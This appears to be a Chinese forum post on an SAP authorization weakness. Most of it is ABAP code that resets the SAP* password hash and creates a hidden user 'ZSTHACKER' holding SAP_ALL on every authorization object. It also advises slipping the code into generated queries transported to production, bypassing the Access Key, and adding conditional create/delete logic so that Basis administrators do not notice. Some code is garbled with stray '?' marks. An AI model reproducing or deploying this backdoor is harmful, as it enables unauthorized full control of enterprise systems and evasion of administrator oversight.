SAP权限控制漏洞
实际上决定权限的是AuthorizationObject , 看USR_USER_AUTH_FOR_OBJ_GET
和AUTHORIZATION_DATA_READ_SELOBJ函数就知道了.
report ZMODPWD.
tables :usr02 .
*Data ZUSR02 like USR02 .
*select? single * into zUSR02 from USR02
*where BNAME = 'SAP*'.
*ZUSR02-BNAME = 'SAP*'.
*ZUSR02-Bcode = '9C8AB8600E74D864' .
*ZUSR02-UFLAG = '0' ."unlock SAP*
*Update USR02 from ZUSR02? .
update usr02 set bcode = 'DF52478E6FF90EEB'
where BNAME = 'SAP*'.
下面是建立用户ZSTHACKER(初始密码123qaz)并赋予SAP*用户的所有权限.
Program ZCRTUSER.
Data ZUSR02 like USR02 .
***1Create User ZSTHACKER according to DDIC
select single * into ZUSR02 from USR02
where BNAME = 'DDIC'.
ZUSR02-BNAME = 'ZSTHACKER'.
ZUSR02-Bcode = 'E3B796BB09F7901B' .
insert USR02 from ZUSR02? .
***2Copy Auth. Obj from SAP*(or other)
data ZUSRBF2 like USRBF2 occurs 0 with header line.
select *? from? USRBF2 into table ZUSRBF2
where BNAME = 'SAP*' .
Loop at ZUSRBF2.
? ZUSRBF2-BNAME = 'ZSTHACKER' .?
? Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.
endloop.
Data Ztobj like tobj occurs 0 with header line .
data zusrbf2 like usrbf2.
select * into table ztobj from tobj .
loop at ztobj.
? zusrbf2-mandt = sy-mandt.
? zusrbf2-bname = 'ZSTHACKER'.
? zusrbf2-objct = ztobj-objct.
? zusrbf2-auth? ='&_SAP_ALL'.
? modify USRBF2 FROM? zusrbf2 .
[1]完善程序有建立和删除用户两功能,并将程序插入将要传送到PRD的实用Query(或report painter)等自动产生的程序(需要绕过Access Key).
[2]写个简单的逻辑如果query的某个条件满足建立用户赋予权限(象上面一样插入数据到USR02和USRBF2中),如果另一条件满足删除相关数据(从usr02和usrbf2中将数据删除)这样basis就难于发现.
Data zusrbf2 like usrbf2.
Select * into zusrbf2 from usrbf2? where bname = 'SAP*' .
Zusrbf2-bname = 'ZSTHACKER' .
Zusrbf2-mandt = '100'.
Insert into usrbf2 client specified values zusrbf2.
Endselect .
